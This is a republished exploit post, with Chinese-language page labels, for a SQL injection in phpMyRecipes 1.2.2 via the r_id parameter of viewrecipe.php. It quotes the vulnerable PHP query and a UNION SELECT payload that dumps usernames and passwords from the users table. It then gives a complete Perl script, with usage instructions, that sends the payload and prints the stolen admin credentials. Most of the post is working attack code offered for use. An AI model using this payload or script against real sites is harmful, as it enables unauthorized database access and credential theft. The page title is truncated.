phpMyRecipes 1.2.2 (viewrecipe.php, r_id param) S

标题：phpMyRecipes 1.2.2 SQL Injection Exploit

作者 cr4wl3r http://bastardlabs.info

下载地址 http://sourceforge.net/projects/php-myrecipes/files/

演示: http://bastardlabs.info/demo/phpMyRecipes.png

测试系统: Ubuntu Linux

漏洞 页面： viewrecipe.php

#

#  $r_id = $_GET['r_id'];

#

#  if (! ($result = mysql _query("SELECT

# name,category,servings,ingredients,instructions,description,creator,editor,imagefile FROM recipes WHERE id=$r_id"))) {

#    dberror("viewrecipe.php", "Cannot select recipe");

#  }

#

# http://HdhCmsTest2cto测试数据 /[path]/recipes/viewrecipe.php?r_id=[SQLi]

#示例： http://bastardlabs/[path]/recipes/viewrecipe.php?r_id=NULL/**/UNION/**/ALL/**/SELECT/**/CONCAT(username,0x3a,password)GORONTALO,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL/**/FROM/**/users

#

#

# $ perl recipes.pl localhost /demo/

# [+] Please Wait ...

#

# [+] Getting Username and Password    [ ok ]

# [+] w00tw00t

# [+] Username | Password --> admin:mps4BNRRjh3po

 

#!/usr/bin/perl

 

use IO::Socket;

 

$host = $ARGV[0];

$path = $ARGV[1];

 

if (@ARGV < 2) {

 

print qq(

+---------------------------------------------+

|   phpMyRecipes 1.2.2 SQL Injection Exploit  |

|                                             |

|            coded & exploited by cr4wl3r     |

|                 http://bastardlabs.info/    |

+---------------------------------------------+

                    -=[X]=-

   +---------------------------------------

    Usage :                               

                                            

    perl $0 <host> <path>                 

    ex : perl $0 127.0.0.1 /phpMyRecipes/ 

                                            

   +---------------------------------------

);

}

 

$target = "http://".$host.$path."/recipes/viewrecipe.php?r_id=NULL/**/UNION/**/ALL/**/SELECT/**/CONCAT(username,0x3a,password)GORONTALO,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL/**/FROM/**/users";

$sock = IO::Socket::INET->new(Proto=>"tcp", PeerAddr=>"$host",

PeerPort=>"80") || die "[-] Can't connect to Server   [ failed ]\n";

print "[+] Please Wait ...\n";

print $sock "GET $target HTTP/1.1\n";

print $sock "Accept: */*\n";

print $sock "User-Agent: BastardLabs\n";

print $sock "Host: $host\n";

print $sock "Connection: close\n\n";

sleep 2;

while ($answer = <$sock>) {

if ($answer =~ /<B>(.*?)<\/B>/) {

print "\n[+] Getting Username and Password    [ ok ]\n";

sleep 1;

print "[+] w00tw00t\n";

print "[+] Username | Password --> $1\n";

exit();

}

}

print "[-] Exploit Failed !\n";

 

查看更多关于phpMyRecipes 1.2.2 (viewrecipe.php, r_id param) S的详细内容...